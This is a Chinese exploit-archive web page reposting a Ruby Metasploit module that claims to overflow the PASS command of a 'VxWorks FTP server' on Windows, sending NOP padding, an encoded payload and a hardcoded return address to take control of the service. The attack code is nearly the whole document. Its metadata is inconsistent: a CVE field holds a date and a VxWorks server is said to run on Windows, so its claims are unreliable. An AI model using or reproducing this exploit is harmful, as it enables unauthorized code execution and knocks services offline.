首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
WVxWorks FTP server Password Overflow
来源:http://www.metasploit.com 作者:Angel 发布时间:2011-09-09  
##
# $Id: VxWorks_FTP_server.rb 16850 2011-09-07 10:20:45Z Iraq $
##
 
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
 
require 'msf/core'
 
class Metasploit3 < Msf::Exploit::Remote
    Rank = AverageRanking
 
    include Msf::Exploit::Remote::Ftp
 
    def initialize(info = {})
        super(update_info(info,
            'Name'           => 'WVxWorks FTP server Password Overflow',
            'Description'    => %q{
                    This exploits the buffer overflow found in the PASS command
                in VxWorks FTP server This particular module will only work
                reliably against Windows targets. The server must be
                configured to allow anonymous logins for this exploit to
                succeed. A failed attempt will bring down the service
                completely.
            },
            'Author'         => 'Angel Injection',
            'License'        => BSD_LICENSE,
            'Version'        => '$Revision: 16850 
, 'References' => [ [ 'CVE', '7/9/2011'], [ 'OSVDB', '16850' ], [ 'BID', '16851' ], [ 'URL', 'http://www.1337day.com/exploits/16851' ], ], 'DefaultOptions' => { 'EXITFUNC' => 'process' }, 'Payload' => { 'Space' => 530, 'BadChars' => "\x00\x0a\x0d\x40", 'StackAdjustment' => -3200, 'Compat' => { 'ConnectionType' => "-find" } }, 'Targets' => [ # Target 0 [ 'Windows', { 'Platform' => 'win', 'Ret' => 0x5f4e772b }, ], ], 'DefaultTarget' => 0, 'DisclosureDate' => '7/9/2011')) end def exploit connect print_status("Trying target #{target.name}...") buf = make_nops(655) + payload.encoded buf[645, 2] = "\xeb\x06" buf[562, 4] = [ target.ret ].pack('V') # Send USER Command send_user(datastore['FTPUSER']) # Send PASS Command send_cmd(['PASS', buf], false) handler disconnect end end
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Ubuntu <= 11.04 ftp client Loc
·N-TRACK Studio universal Local
·DVD X Player 5.5 Pro (SEH DEP
·PHP "phar/phar_object.c" forma
·Wordpress 1 Flash Gallery Plug
·Wing FTP Server USER Buffer Ov
·BisonFTP Server Remote Buffer
·ludmila_f FTP Remote Buffer Ov
·Mel0nPlayer 1.0.11.x Denial of
·CinePlayer Surround Universal
·ScadaTEC ModbusTagServer & Sca
·Windows Server 2008 R1 Local D
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved